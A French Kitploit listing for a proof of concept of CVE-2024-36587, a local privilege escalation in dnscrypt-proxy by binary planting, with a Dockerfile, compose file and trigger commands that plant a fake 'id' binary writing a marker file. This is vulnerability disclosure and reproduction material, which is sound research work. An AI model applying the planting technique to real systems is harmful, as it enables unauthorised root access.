Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-36587 — Exploit de preuve de concept pour CVE-2024-36587 démontrant une escalade de privilèges locale dans dnscrypt-proxy via une attaque de type binary planting, avec un environnement de reproduction basé sur Docker. | Kitploit
Outils/GitHubGitHub/meeeeing/cve-2024-36587
Escalade de PrivilègesSécurité des ConteneursAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHubmeeeeing/cve-2024-36587

CVE-2024-36587

Exploit de preuve de concept pour CVE-2024-36587 démontrant une escalade de privilèges locale dans dnscrypt-proxy via une attaque de type binary planting, avec un environnement de reproduction basé sur Docker.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-36587 - Élévation de privilèges locale de dnscrypt-proxy

Résumé

  • Description de la vulnérabilité : lors de l'installation du service dnscrypt-proxy, celui-ci fait confiance et enregistre le fichier exécutable du répertoire courant, ce qui permet d'insérer un binaire malveillant pour élever les privilèges.
  • Version vulnérable : dnscrypt-proxy v2.0.0-alpha9 ~ v2.1.5
  • Méthode PoC : dépôt de binaire (binary planting)

Configuration de l'environnement

root@kitploit:~
docker compose up --build

Une fois la construction et l'exécution terminées, un conteneur est créé.

Accès à l'intérieur du conteneur :

root@kitploit:~
docker run -it --privileged dnscrypt-poc-poc bash

Déclenchement de la vulnérabilité

À l'intérieur du conteneur :

root@kitploit:~
/tmp/id
cat /tmp/poc_was_here

Si Pwned_from_Docker s'affiche, le PoC est réussi.

Fichiers de configuration

Dockerfile

root@kitploit:~
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y \
    git \
    golang-go \
    sudo

WORKDIR /workspace

RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
    cd dnscrypt-proxy && \
    git checkout tags/2.1.0 && \
    go build -o proxy ./dnscrypt-proxy

RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
    chmod +x /tmp/id && \
    ln -sf /tmp/id /usr/local/bin/id

CMD ["./dnscrypt-proxy/proxy", "-service", "install"]

docker-compose.yaml

root@kitploit:~
version: "3.8"

services:
  poc:
    build: .
    container_name: dnscrypt-poc
    privileged: true
    tty: true

Références

  • https://github.com/DNSCrypt/dnscrypt-proxy
  • https://nvd.nist.gov/vuln/detail/CVE-2024-36587

Capture d'écran des résultats pratiques

docker build success

Rapport détaillé

Pour une analyse plus détaillée et les résultats pratiques, consultez le document PDF suivant :

PoC_Report_CVE-2024-36587.pdf

Télécharger l’outil